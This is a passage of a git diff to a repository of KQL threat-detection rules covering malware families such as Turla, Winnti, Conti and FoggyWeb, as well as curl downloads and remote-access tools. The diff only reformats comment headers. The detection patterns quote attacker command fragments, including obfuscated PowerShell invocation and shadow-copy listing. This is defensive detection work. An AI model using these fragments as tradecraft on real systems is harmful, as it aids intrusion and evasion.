process characteristics of Chinese TAIDOOR RAT malware load -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.execution, attack.t1055.001, detection.emerging-threats - -DeviceProcessEvents +// Title: TAIDOOR RAT DLL Load +// Author: Florian Roth (Nextron Systems) +// Date: 2020-07-30 +// Level: high +// Description: Detects specific process characteristics of Chinese TAIDOOR RAT malware load +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.execution, attack.t1055.001, detection.emerging-threats + +DeviceProcessEvents | where (ProcessCommandLine contains "dll,MyStart" or ProcessCommandLine contains "dll MyStart") or (ProcessCommandLine endswith " MyStart" and ProcessCommandLine contains "rundll32.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/turla_group_commands_may_2020.kql b/KQL/rules-emerging-threats/Privilege Escalation/turla_group_commands_may_2020.kql index 19ca8603..69c36a2b 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/turla_group_commands_may_2020.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/turla_group_commands_may_2020.kql @@ -1,10 +1,10 @@ -// Title: Turla Group Commands May 2020 -// Author: Florian Roth (Nextron Systems) -// Date: 2020-05-26 -// Level: critical -// Description: Detects commands used by Turla group as reported by ESET in May 2020 -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.g0010, attack.execution, attack.t1059.001, attack.t1053.005, attack.t1027, detection.emerging-threats - -DeviceProcessEvents +// Title: Turla Group Commands May 2020 +// Author: Florian Roth (Nextron Systems) +// Date: 2020-05-26 +// Level: critical +// Description: Detects commands used by Turla group as reported by ESET in May 2020 +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.g0010, attack.execution, attack.t1059.001, attack.t1053.005, attack.t1027, detection.emerging-threats + +DeviceProcessEvents | where (ProcessCommandLine contains "tracert -h 10 yahoo.com" or ProcessCommandLine contains ".WSqmCons))|iex;" or ProcessCommandLine contains "Fr`omBa`se6`4Str`ing") or (ProcessCommandLine contains "@aol.co.uk" and ProcessCommandLine matches regex "net\\s+use\\s+https://docs.live.net") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/winnti_malware_hk_university_campaign.kql b/KQL/rules-emerging-threats/Privilege Escalation/winnti_malware_hk_university_campaign.kql index 996d9685..118003cd 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/winnti_malware_hk_university_campaign.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/winnti_malware_hk_university_campaign.kql @@ -1,12 +1,12 @@ -// Title: Winnti Malware HK University Campaign -// Author: Florian Roth (Nextron Systems), Markus Neis -// Date: 2020-02-01 -// Level: critical -// Description: Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.g0044, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Winnti Malware HK University Campaign +// Author: Florian Roth (Nextron Systems), Markus Neis +// Date: 2020-02-01 +// Level: critical +// Description: Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.g0044, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (FolderPath startswith "C:\\ProgramData\\DRM" and (InitiatingProcessFolderPath contains "C:\\Windows\\Temp" or InitiatingProcessFolderPath contains "\\hpqhvind.exe")) or (FolderPath endswith "\\wmplayer.exe" and InitiatingProcessFolderPath startswith "C:\\ProgramData\\DRM") or (FolderPath endswith "\\wmplayer.exe" and InitiatingProcessFolderPath endswith "\\Test.exe") or FolderPath =~ "C:\\ProgramData\\DRM\\CLR\\CLR.exe" or (FolderPath endswith "\\SearchFilterHost.exe" and InitiatingProcessFolderPath startswith "C:\\ProgramData\\DRM\\Windows") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/winnti_pipemon_characteristics.kql b/KQL/rules-emerging-threats/Privilege Escalation/winnti_pipemon_characteristics.kql index 2f7b9965..51e20957 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/winnti_pipemon_characteristics.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/winnti_pipemon_characteristics.kql @@ -1,12 +1,12 @@ -// Title: Winnti Pipemon Characteristics -// Author: Florian Roth (Nextron Systems), oscd.community -// Date: 2020-07-30 -// Level: critical -// Description: Detects specific process characteristics of Winnti Pipemon malware reported by ESET -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.g0044, detection.emerging-threats -// False Positives: -// - Legitimate setups that use similar flags - -DeviceProcessEvents +// Title: Winnti Pipemon Characteristics +// Author: Florian Roth (Nextron Systems), oscd.community +// Date: 2020-07-30 +// Level: critical +// Description: Detects specific process characteristics of Winnti Pipemon malware reported by ESET +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.g0044, detection.emerging-threats +// False Positives: +// - Legitimate setups that use similar flags + +DeviceProcessEvents | where ProcessCommandLine contains "setup0.exe -p" or (ProcessCommandLine contains "setup.exe" and (ProcessCommandLine endswith "-x:0" or ProcessCommandLine endswith "-x:1" or ProcessCommandLine endswith "-x:2")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Resource Development/conti_volume_shadow_listing.kql b/KQL/rules-emerging-threats/Resource Development/conti_volume_shadow_listing.kql index 213e1824..98a53527 100644 --- a/KQL/rules-emerging-threats/Resource Development/conti_volume_shadow_listing.kql +++ b/KQL/rules-emerging-threats/Resource Development/conti_volume_shadow_listing.kql @@ -1,10 +1,10 @@ -// Title: Conti Volume Shadow Listing -// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems) -// Date: 2021-08-09 -// Level: high -// Description: Detects a command used by conti to find volume shadow backups -// MITRE Tactic: Resource Development -// Tags: attack.t1587.001, attack.resource-development, detection.emerging-threats - -DeviceProcessEvents +// Title: Conti Volume Shadow Listing +// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems) +// Date: 2021-08-09 +// Level: high +// Description: Detects a command used by conti to find volume shadow backups +// MITRE Tactic: Resource Development +// Tags: attack.t1587.001, attack.resource-development, detection.emerging-threats + +DeviceProcessEvents | where ProcessCommandLine contains "vssadmin list shadows" and ProcessCommandLine contains "log.txt" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Resource Development/foggyweb_backdoor_dll_loading.kql b/KQL/rules-emerging-threats/Resource Development/foggyweb_backdoor_dll_loading.kql index 06914cb0..671f391a 100644 --- a/KQL/rules-emerging-threats/Resource Development/foggyweb_backdoor_dll_loading.kql +++ b/KQL/rules-emerging-threats/Resource Development/foggyweb_backdoor_dll_loading.kql @@ -1,12 +1,12 @@ -// Title: FoggyWeb Backdoor DLL Loading -// Author: Florian Roth (Nextron Systems) -// Date: 2021-09-27 -// Level: critical -// Description: Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected "version.dll" dll -// MITRE Tactic: Resource Development -// Tags: attack.resource-development, attack.t1587, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceImageLoadEvents +// Title: FoggyWeb Backdoor DLL Loading +// Author: Florian Roth (Nextron Systems) +// Date: 2021-09-27 +// Level: critical +// Description: Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected "version.dll" dll +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1587, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceImageLoadEvents | where FolderPath =~ "C:\\Windows\\ADFS\\version.dll" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Resource Development/formbook_process_creation.kql b/KQL/rules-emerging-threats/Resource Development/formbook_process_creation.kql index 4d0dd96b..cdac7d56 100644 --- a/KQL/rules-emerging-threats/Resource Development/formbook_process_creation.kql +++ b/KQL/rules-emerging-threats/Resource Development/formbook_process_creation.kql @@ -1,10 +1,10 @@ -// Title: Formbook Process Creation -// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro -// Date: 2019-09-30 -// Level: high -// Description: Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters. -// MITRE Tactic: Resource Development -// Tags: attack.resource-development, attack.t1587.001, detection.emerging-threats - -DeviceProcessEvents +// Title: Formbook Process Creation +// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro +// Date: 2019-09-30 +// Level: high +// Description: Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters. +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1587.001, detection.emerging-threats + +DeviceProcessEvents | where (InitiatingProcessCommandLine endswith ".exe" and (InitiatingProcessCommandLine startswith "C:\\Windows\\System32\\" or InitiatingProcessCommandLine startswith "C:\\Windows\\SysWOW64\\")) and ((ProcessCommandLine contains "/c" and ProcessCommandLine contains "del" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Temp\\") or (ProcessCommandLine contains "/c" and ProcessCommandLine contains "del" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\Desktop\\") or (ProcessCommandLine contains "/C" and ProcessCommandLine contains "type nul >" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\Desktop\\")) and ProcessCommandLine endswith ".exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Resource Development/mustang_panda_dropper.kql b/KQL/rules-emerging-threats/Resource Development/mustang_panda_dropper.kql index c34e093f..6cb47e3b 100644 --- a/KQL/rules-emerging-threats/Resource Development/mustang_panda_dropper.kql +++ b/KQL/rules-emerging-threats/Resource Development/mustang_panda_dropper.kql @@ -1,12 +1,12 @@ -// Title: Mustang Panda Dropper -// Author: Florian Roth (Nextron Systems), oscd.community -// Date: 2019-10-30 -// Level: high -// Description: Detects specific process parameters as used by Mustang Panda droppers -// MITRE Tactic: Resource Development -// Tags: attack.t1587.001, attack.resource-development, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Mustang Panda Dropper +// Author: Florian Roth (Nextron Systems), oscd.community +// Date: 2019-10-30 +// Level: high +// Description: Detects specific process parameters as used by Mustang Panda droppers +// MITRE Tactic: Resource Development +// Tags: attack.t1587.001, attack.resource-development, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ((ProcessCommandLine contains "Temp\\wtask.exe /create" or ProcessCommandLine contains "%windir:~-3,1%%PUBLIC:~-9,1%" or ProcessCommandLine contains "/tn \"Security Script " or ProcessCommandLine contains "%windir:~-1,1%") or (ProcessCommandLine contains "/E:vbscript" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains ".txt" and ProcessCommandLine contains "/F")) or FolderPath endswith "Temp\\winwsh.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Resource Development/suspicious_word_cab_file_write_cve_2021_40444.kql b/KQL/rules-emerging-threats/Resource Development/suspicious_word_cab_file_write_cve_2021_40444.kql index 4a9cea7b..18b31d5f 100644 --- a/KQL/rules-emerging-threats/Resource Development/suspicious_word_cab_file_write_cve_2021_40444.kql +++ b/KQL/rules-emerging-threats/Resource Development/suspicious_word_cab_file_write_cve_2021_40444.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Word Cab File Write CVE-2021-40444 -// Author: Florian Roth (Nextron Systems), Sittikorn S -// Date: 2021-09-10 -// Level: high -// Description: Detects file creation patterns noticeable during the exploitation of CVE-2021-40444 -// MITRE Tactic: Resource Development -// Tags: attack.resource-development, attack.t1587, detection.emerging-threats - -DeviceFileEvents +// Title: Suspicious Word Cab File Write CVE-2021-40444 +// Author: Florian Roth (Nextron Systems), Sittikorn S +// Date: 2021-09-10 +// Level: high +// Description: Detects file creation patterns noticeable during the exploitation of CVE-2021-40444 +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1587, detection.emerging-threats + +DeviceFileEvents | where ((InitiatingProcessFolderPath endswith "\\winword.exe" and FolderPath contains "\\Windows\\INetCache" and FolderPath endswith ".cab") or (InitiatingProcessFolderPath endswith "\\winword.exe" and (FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath contains ".inf"))) and (not((FolderPath contains "AppData\\Local\\Temp" and FolderPath endswith "\\Content.inf" and FolderPath startswith "C:\\Users\\"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Collection/clipboard_data_collection_via_pbpaste.kql b/KQL/rules-threat-hunting/Collection/clipboard_data_collection_via_pbpaste.kql index 549dd621..0f8ca697 100644 --- a/KQL/rules-threat-hunting/Collection/clipboard_data_collection_via_pbpaste.kql +++ b/KQL/rules-threat-hunting/Collection/clipboard_data_collection_via_pbpaste.kql @@ -1,16 +1,16 @@ -// Title: Clipboard Data Collection Via Pbpaste -// Author: Daniel Cortez -// Date: 2024-07-30 -// Level: medium -// Description: Detects execution of the "pbpaste" utility, which retrieves the contents of the clipboard (a.k.a. pasteboard) and writes them to the standard output (stdout). -// The utility is often used for creating new files with the clipboard content or for piping clipboard contents to other commands. -// It can also be used in shell scripts that may require clipboard content as input. -// Attackers can abuse this utility in order to collect data from the user clipboard, which may contain passwords or sensitive information. -// Use this rule to hunt for potential abuse of the utility by looking at the parent process and any potentially suspicious command line content. -// MITRE Tactic: Collection -// Tags: attack.collection, attack.credential-access, attack.t1115, detection.threat-hunting -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: Clipboard Data Collection Via Pbpaste +// Author: Daniel Cortez +// Date: 2024-07-30 +// Level: medium +// Description: Detects execution of the "pbpaste" utility, which retrieves the contents of the clipboard (a.k.a. pasteboard) and writes them to the standard output (stdout). +// The utility is often used for creating new files with the clipboard content or for piping clipboard contents to other commands. +// It can also be used in shell scripts that may require clipboard content as input. +// Attackers can abuse this utility in order to collect data from the user clipboard, which may contain passwords or sensitive information. +// Use this rule to hunt for potential abuse of the utility by looking at the parent process and any potentially suspicious command line content. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.credential-access, attack.t1115, detection.threat-hunting +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where FolderPath endswith "/pbpaste" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Collection/password_protected_compressed_file_extraction_via_7zip.kql b/KQL/rules-threat-hunting/Collection/password_protected_compressed_file_extraction_via_7zip.kql index 9d43295f..1d68187a 100644 --- a/KQL/rules-threat-hunting/Collection/password_protected_compressed_file_extraction_via_7zip.kql +++ b/KQL/rules-threat-hunting/Collection/password_protected_compressed_file_extraction_via_7zip.kql @@ -1,12 +1,12 @@ -// Title: Password Protected Compressed File Extraction Via 7Zip -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-03-10 -// Level: low -// Description: Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files. -// MITRE Tactic: Collection -// Tags: attack.collection, attack.t1560.001, detection.threat-hunting -// False Positives: -// - Legitimate activity is expected since extracting files with a password can be common in some environment. - -DeviceProcessEvents +// Title: Password Protected Compressed File Extraction Via 7Zip +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-10 +// Level: low +// Description: Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1560.001, detection.threat-hunting +// False Positives: +// - Legitimate activity is expected since extracting files with a password can be common in some environment. + +DeviceProcessEvents | where (ProcessVersionInfoFileDescription contains "7-Zip" or (FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7zr.exe" or FolderPath endswith "\\7za.exe") or (ProcessVersionInfoOriginalFileName in~ ("7z.exe", "7za.exe"))) and (ProcessCommandLine contains " -p" and ProcessCommandLine contains " x " and ProcessCommandLine contains " -o") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Collection/potentially_suspicious_compression_tool_parameters.kql b/KQL/rules-threat-hunting/Collection/potentially_suspicious_compression_tool_parameters.kql index c392e3c7..8abde06b 100644 --- a/KQL/rules-threat-hunting/Collection/potentially_suspicious_compression_tool_parameters.kql +++ b/KQL/rules-threat-hunting/Collection/potentially_suspicious_compression_tool_parameters.kql @@ -1,10 +1,10 @@ -// Title: Potentially Suspicious Compression Tool Parameters -// Author: Florian Roth (Nextron Systems), Samir Bousseaden -// Date: 2019-10-15 -// Level: medium -// Description: Detects potentially suspicious command line arguments of common data compression tools -// MITRE Tactic: Collection -// Tags: attack.collection, attack.t1560.001, detection.threat-hunting - -DeviceProcessEvents +// Title: Potentially Suspicious Compression Tool Parameters +// Author: Florian Roth (Nextron Systems), Samir Bousseaden +// Date: 2019-10-15 +// Level: medium +// Description: Detects potentially suspicious command line arguments of common data compression tools +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1560.001, detection.threat-hunting + +DeviceProcessEvents | where ((ProcessCommandLine contains " -p" or ProcessCommandLine contains " -ta" or ProcessCommandLine contains " -tb" or ProcessCommandLine contains " -sdel" or ProcessCommandLine contains " -dw" or ProcessCommandLine contains " -hp") and ((ProcessVersionInfoOriginalFileName contains "7z" and ProcessVersionInfoOriginalFileName contains ".exe") or ProcessVersionInfoOriginalFileName endswith "rar.exe" or (ProcessVersionInfoOriginalFileName contains "Command" and ProcessVersionInfoOriginalFileName contains "Line" and ProcessVersionInfoOriginalFileName contains "RAR"))) and (not((InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Collection/system_drawing_dll_load.kql b/KQL/rules-threat-hunting/Collection/system_drawing_dll_load.kql index 4c19b2cc..6a9853bb 100644 --- a/KQL/rules-threat-hunting/Collection/system_drawing_dll_load.kql +++ b/KQL/rules-threat-hunting/Collection/system_drawing_dll_load.kql @@ -1,12 +1,12 @@ -// Title: System Drawing DLL Load -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020-05-02 -// Level: low -// Description: Detects processes loading "System.Drawing.ni.dll". This could be an indicator of potential Screen Capture. -// MITRE Tactic: Collection -// Tags: attack.collection, attack.t1113, detection.threat-hunting -// False Positives: -// - False positives are very common from system and third party applications, activity needs to be investigated. This rule is best correlated with other events to increase the level of suspiciousness - -DeviceImageLoadEvents +// Title: System Drawing DLL Load +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-05-02 +// Level: low +// Description: Detects processes loading "System.Drawing.ni.dll". This could be an indicator of potential Screen Capture. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1113, detection.threat-hunting +// False Positives: +// - False positives are very common from system and third party applications, activity needs to be investigated. This rule is best correlated with other events to increase the level of suspiciousness + +DeviceImageLoadEvents | where FolderPath endswith "\\System.Drawing.ni.dll" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Command and Control/curl_exe_execution.kql b/KQL/rules-threat-hunting/Command and Control/curl_exe_execution.kql index 6a609ab3..07bf3686 100644 --- a/KQL/rules-threat-hunting/Command and Control/curl_exe_execution.kql +++ b/KQL/rules-threat-hunting/Command and Control/curl_exe_execution.kql @@ -1,13 +1,13 @@ -// Title: Curl.EXE Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2022-07-05 -// Level: low -// Description: Detects a curl process start on Windows, which could indicates a file download from a remote location or a simple web request to a remote server -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105, detection.threat-hunting -// False Positives: -// - Scripts created by developers and admins -// - Administrative activity - -DeviceProcessEvents +// Title: Curl.EXE Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-07-05 +// Level: low +// Description: Detects a curl process start on Windows, which could indicates a file download from a remote location or a simple web request to a remote server +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105, detection.threat-hunting +// False Positives: +// - Scripts created by developers and admins +// - Administrative activity + +DeviceProcessEvents | where FolderPath endswith "\\curl.exe" or ProcessVersionInfoProductName =~ "The curl executable" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Command and Control/curl_exe_execution_with_custom_useragent.kql b/KQL/rules-threat-hunting/Command and Control/curl_exe_execution_with_custom_useragent.kql index 2f6a2f58..0a262283 100644 --- a/KQL/rules-threat-hunting/Command and Control/curl_exe_execution_with_custom_useragent.kql +++ b/KQL/rules-threat-hunting/Command and Control/curl_exe_execution_with_custom_useragent.kql @@ -1,13 +1,13 @@ -// Title: Curl.EXE Execution With Custom UserAgent -// Author: frack113 -// Date: 2022-01-23 -// Level: medium -// Description: Detects execution of curl.exe with custom useragent options -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1071.001, detection.threat-hunting -// False Positives: -// - Scripts created by developers and admins -// - Administrative activity - -DeviceProcessEvents +// Title: Curl.EXE Execution With Custom UserAgent +// Author: frack113 +// Date: 2022-01-23 +// Level: medium +// Description: Detects execution of curl.exe with custom useragent options +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1071.001, detection.threat-hunting +// False Positives: +// - Scripts created by developers and admins +// - Administrative activity + +DeviceProcessEvents | where (FolderPath endswith "\\curl.exe" or ProcessVersionInfoProductName =~ "The curl executable") and (ProcessCommandLine contains " -A " or ProcessCommandLine contains " --user-agent ") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Command and Control/file_download_via_curl_exe.kql b/KQL/rules-threat-hunting/Command and Control/file_download_via_curl_exe.kql index 6ba7d784..fdba60b6 100644 --- a/KQL/rules-threat-hunting/Command and Control/file_download_via_curl_exe.kql +++ b/KQL/rules-threat-hunting/Command and Control/file_download_via_curl_exe.kql @@ -1,14 +1,14 @@ -// Title: File Download Via Curl.EXE -// Author: Florian Roth (Nextron Systems) -// Date: 2022-07-05 -// Level: medium -// Description: Detects file download using curl.exe -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105, detection.threat-hunting -// False Positives: -// - Scripts created by developers and admins -// - Administrative activity -// - The "\Git\usr\bin\sh.exe" process uses the "--output" flag to download a specific file in the temp directory with the pattern "gfw-httpget-xxxxxxxx.txt " - -DeviceProcessEvents +// Title: File Download Via Curl.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2022-07-05 +// Level: medium +// Description: Detects file download using curl.exe +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105, detection.threat-hunting +// False Positives: +// - Scripts created by developers and admins +// - Administrative activity +// - The "\Git\usr\bin\sh.exe" process uses the "--output" flag to download a specific file in the temp directory with the pattern "gfw-httpget-xxxxxxxx.txt " + +DeviceProcessEvents | where (FolderPath endswith "\\curl.exe" or ProcessVersionInfoProductName =~ "The curl executable") and (ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Command and Control/network_connection_initiated_from_users_public_folder.kql b/KQL/rules-threat-hunting/Command and Control/network_connection_initiated_from_users_public_folder.kql index 20b4ab4f..8f4d2604 100644 --- a/KQL/rules-threat-hunting/Command and Control/network_connection_initiated_from_users_public_folder.kql +++ b/KQL/rules-threat-hunting/Command and Control/network_connection_initiated_from_users_public_folder.kql @@ -1,14 +1,14 @@ -// Title: Network Connection Initiated From Users\Public Folder -// Author: Florian Roth (Nextron Systems) -// Date: 2024-05-31 -// Level: medium -// Description: Detects a network connection initiated from a process located in the "C:\Users\Public" folder. -// Attacker are known to drop their malicious payloads and malware in this directory as its writable by everyone. -// Use this rule to hunt for potential suspicious or uncommon activity in your environement. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105, detection.threat-hunting -// False Positives: -// - Likely from legitimate third party application that execute from the "Public" directory. - -DeviceNetworkEvents +// Title: Network Connection Initiated From Users\Public Folder +// Author: Florian Roth (Nextron Systems) +// Date: 2024-05-31 +// Level: medium +// Description: Detects a network connection initiated from a process located in the "C:\Users\Public" folder. +// Attacker are known to drop their malicious payloads and malware in this directory as its writable by everyone. +// Use this rule to hunt for potential suspicious or uncommon activity in your environement. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105, detection.threat-hunting +// False Positives: +// - Likely from legitimate third party application that execute from the "Public" directory. + +DeviceNetworkEvents | where InitiatingProcessFolderPath contains ":\\Users\\Public\\" and (not(InitiatingProcessFolderPath contains ":\\Users\\Public\\IBM\\ClientSolutions\\Start_Programs\\")) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Command and Control/potentially_suspicious_azure_front_door_connection.kql b/KQL/rules-threat-hunting/Command and Control/potentially_suspicious_azure_front_door_connection.kql index b93ca019..3315f64c 100644 --- a/KQL/rules-threat-hunting/Command and Control/potentially_suspicious_azure_front_door_connection.kql +++ b/KQL/rules-threat-hunting/Command and Control/potentially_suspicious_azure_front_door_connection.kql @@ -1,14 +1,14 @@ -// Title: Potentially Suspicious Azure Front Door Connection -// Author: Isaac Dunham -// Date: 2024-11-07 -// Level: medium -// Description: Detects connections with Azure Front Door (known legitimate service that can be leveraged for C2) -// that fall outside of known benign behavioral baseline (not using common apps or common azurefd.net endpoints) -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1102.002, attack.t1090.004, detection.threat-hunting -// False Positives: -// - Results are not inherently suspicious, but should be investigated during threat hunting for potential cloud C2. -// - Organization-specific Azure Front Door endpoints - -DeviceNetworkEvents +// Title: Potentially Suspicious Azure Front Door Connection +// Author: Isaac Dunham +// Date: 2024-11-07 +// Level: medium +// Description: Detects connections with Azure Front Door (known legitimate service that can be leveraged for C2) +// that fall outside of known benign behavioral baseline (not using common apps or common azurefd.net endpoints) +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1102.002, attack.t1090.004, detection.threat-hunting +// False Positives: +// - Results are not inherently suspicious, but should be investigated during threat hunting for potential cloud C2. +// - Organization-specific Azure Front Door endpoints + +DeviceNetworkEvents | where RemoteUrl contains "azurefd.net" and (not((InitiatingProcessFolderPath endswith "searchapp.exe" or (RemoteUrl contains "afdxtest.z01.azurefd.net" or RemoteUrl contains "fp-afd.azurefd.net" or RemoteUrl contains "fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net" or RemoteUrl contains "roxy.azurefd.net" or RemoteUrl contains "powershellinfraartifacts-gkhedzdeaghdezhr.z01.azurefd.net" or RemoteUrl contains "storage-explorer-publishing-feapcgfgbzc2cjek.b01.azurefd.net" or RemoteUrl contains "graph.azurefd.net") or (InitiatingProcessFolderPath endswith "brave.exe" or InitiatingProcessFolderPath endswith "chrome.exe" or InitiatingProcessFolderPath endswith "chromium.exe" or InitiatingProcessFolderPath endswith "firefox.exe" or InitiatingProcessFolderPath endswith "msedge.exe" or InitiatingProcessFolderPath endswith "msedgewebview2.exe" or InitiatingProcessFolderPath endswith "opera.exe" or InitiatingProcessFolderPath endswith "vivaldi.exe")))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Command and Control/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql b/KQL/rules-threat-hunting/Command and Control/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql index d890d718..0ad02020 100644 --- a/KQL/rules-threat-hunting/Command and Control/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql +++ b/KQL/rules-threat-hunting/Command and Control/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql @@ -1,20 +1,20 @@ -// Title: Remote Access Tool - Action1 Arbitrary Code Execution and Remote Sessions -// Author: @kostastsale -// Date: 2023-04-13 -// Level: medium -// Description: Detects the execution of Action1 in order to execute arbitrary code or establish a remote session. -// Action1 is a powerful Remote Monitoring and Management tool that enables users to execute commands, scripts, and binaries. -// Through the web interface of action1, the administrator must create a new policy or an app to establish remote execution and then points that the agent is installed. -// Hunting Opportunity 1- Weed Out The Noise -// When threat actors execute a script, a command, or a binary through these new policies and apps, the names of these become visible in the command line during the execution process. Below is an example of the command line that contains the deployment of a binary through a policy with name "test_app_1": -// ParentCommandLine: "C:\WINDOWS\Action1\action1_agent.exe schedule:Deploy_App__test_app_1_1681327673425 runaction:0" -// After establishing a baseline, we can split the command to extract the policy name and group all the policy names and inspect the results with a list of frequency occurrences. -// Hunting Opportunity 2 - Remote Sessions On Out Of Office Hours -// If you have admins within your environment using remote sessions to administer endpoints, you can create a threat-hunting query and modify the time of the initiated sessions looking for abnormal activity. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219.002, detection.threat-hunting -// False Positives: -// - If Action1 is among the approved software in your environment, you might find that this is a noisy query. See description for ideas on how to alter this query and start looking for suspicious activities. - -DeviceProcessEvents +// Title: Remote Access Tool - Action1 Arbitrary Code Execution and Remote Sessions +// Author: @kostastsale +// Date: 2023-04-13 +// Level: medium +// Description: Detects the execution of Action1 in order to execute arbitrary code or establish a remote session. +// Action1 is a powerful Remote Monitoring and Management tool that enables users to execute commands, scripts, and binaries. +// Through the web interface of action1, the administrator must create a new policy or an app to establish remote execution and then points that the agent is installed. +// Hunting Opportunity 1- Weed Out The Noise +// When threat actors execute a script, a command, or a binary through these new policies and apps, the names of these become visible in the command line during the execution process. Below is an example of the command line that contains the deployment of a binary through a policy with name "test_app_1": +// ParentCommandLine: "C:\WINDOWS\Action1\action1_agent.exe schedule:Deploy_App__test_app_1_1681327673425 